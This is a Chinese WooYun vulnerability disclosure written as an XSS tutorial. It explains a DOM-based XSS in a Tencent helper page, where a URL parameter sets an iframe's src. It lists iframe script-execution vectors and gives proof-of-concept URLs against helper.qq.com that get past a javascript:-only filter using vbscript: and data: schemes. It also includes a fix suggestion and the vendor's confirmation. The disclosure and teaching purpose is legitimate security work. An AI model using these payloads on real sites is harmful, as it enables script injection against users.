漏洞概要 关注数(32) 关注此漏洞

缺陷编号: WooYun-2012-16223

漏洞标题: [腾讯实例教程] 那些年我们一起学XSS - 11. Dom Xss进阶 [善变iframe]

相关厂商: 腾讯

漏洞作者: 心伤的瘦子

提交时间: 2012-12-19 15:52

公开时间: 2013-02-02 15:53

漏洞类型: xss跨站脚本攻击

危害等级: 低

自评Rank: 2

漏洞状态: 厂商已经确认

Tags标签: 反射型xss xss利用技巧 Dom+xss

7人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-19: 细节已通知厂商并且等待厂商处理中
2012-12-19: 厂商已经确认,细节仅向厂商公开
2012-12-29: 细节向核心白帽子及相关领域专家公开
2013-01-08: 细节向普通白帽子公开
2013-01-18: 细节向实习白帽子公开
2013-02-02: 细节向公众公开

简要描述:

有时候,输出还会出现在 <iframe src="[输出]"></iframe> 。 iframe 的 src属性本来应该是一个网址,但是iframe之善变,使得它同样可以执行javascript,而且可以用不同的姿势来执行。这一类问题,我将其归为[路径可控]问题。当然上面说到的是普通的反射型XSS。有时候程序员会使用javascript来动态的改变iframe的src属性,譬如:iframeA.src="[可控的url]"; 同样会导致XSS问题,来看看本例吧~

详细说明:

1. 先来说说iframe的变化。



1.1 最好懂的,onload执行js

<iframe onload="alert(1)"></iframe>



1.2 src 执行javascript代码

<iframe src="javascript:alert(1)"></iframe>



1.3 IE下vbscript执行代码

<iframe src="vbscript:msgbox(1)"></iframe>



1.4 Chrome下data协议执行代码

<iframe src="data:text/html,<script>alert(1)</script>"></iframe> Chrome



1.5 上面的变体

<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>



1.6 Chrome下srcdoc属性

<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>



2. 有兴趣的,可以一个一个的去测试上面的效果,注意浏览器的特异性哦。



3. 接着我们来看看具体的例子。



http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=aaaaaa&gid=yl&cid=68&from=





4. 我们先开调试工具,看看有没有可见的输出。



picture\4_57.jpg





可以看到,我们参数的aaaaaa被带入到了<iframe src="这里"></iframe>。



这样一来,就满足了我们的使用条件。



我们试试



http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=javascript:alert(1);&gid=yl&cid=68&from=





。。竟然没反应。我们来看看刚才的那个地方。



picture\7_58.jpg





可以看到,src这次没属性了,看来腾讯做了什么过滤。我们继续搜索下一个toolframe试试。



恩,看来就是这段代码导致的。



picture\10_59.jpg





一起看看这段代码。



function OpenFrame(url) {
if (url.toLowerCase().indexOf('http://') != '-1' || url.toLowerCase().indexOf('https://') != '-1' || url.toLowerCase().indexOf('javascript:') != '-1') return false;
document.getElementById("toolframe").src = url;
}





不难看出,腾讯对 javascript:做出了判断。



document.getElementById("toolframe").src = url;





这句是导致XSS的一句代码。而openFrame的url参数则来自于(无关代码省略):



...
var tool_url = getQueryStringValue("turl");
...
openFrame(tool_url);
...







5. 根据我们上面说道的iframe的利用方法,我们不难看出,腾讯的过滤是不完善的。



在IE下,我们可以使用vbscript来执行代码。 vbscript里 ' 单引号表示注释,类似JS里的//



http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=vbscript:msgbox(1)'&gid=yl&cid=68&from=





picture\13_60.jpg





在chrome下,我们可以用data协议来执行JS。



http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=data:text/html,<script>alert(1)</script>'&gid=yl&cid=68&from=





picture\16_61.jpg





6. 就到这里。

漏洞证明:

见详细说明

修复方案:

危险的不光是javascript:,

vbscript:, data: 等同样需要过滤。

版权声明:转载请注明来源 心伤的瘦子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2012-12-19 16:24

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评论

  1. 2012-12-19 15:58 | txcbg ( 普通白帽子 | Rank:294 漏洞数:39 | 说点什么呢?)
    0

    沙发

  2. 2012-12-19 17:07 | se55i0n ( 普通白帽子 | Rank:1156 漏洞数:129 | 我是一名白帽子,简称小白!)
    0

    @心伤的瘦子 老湿呀,俺可喜欢看你的续集啦~标题有文采呀

  3. 2012-12-19 17:20 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 嘿,我崇拜你们来了)
    0

    @se55i0n 谢谢关注。

  4. 2012-12-19 18:07 | 鬼魅羊羔 ( 普通白帽子 | Rank:164 漏洞数:25 | 不许动!我是警察!)
    0

    。。

  5. 2012-12-19 19:55 | dyun ( 实习白帽子 | Rank:75 漏洞数:12 )
    0

    ....为什么每个rank都是5...老湿~~每贴必markk

  6. 2012-12-23 23:09 | px1624 ( 普通白帽子 | Rank:438 漏洞数:57 | 电脑业余爱好者,菜鸟一个,是来交流学习的...)
    0

    @dyun ...教程,其实有一个是10,要的5给的10...

  7. 2013-01-20 15:53 | 九九 ( 实习白帽子 | Rank:5 漏洞数:3 | 暂无。)
    0

    撸了

  8. 2013-02-16 21:06 | mole3o ( 实习白帽子 | Rank:10 漏洞数:2 | 学生一枚,青春向上的白帽子。)
    0

    学习了!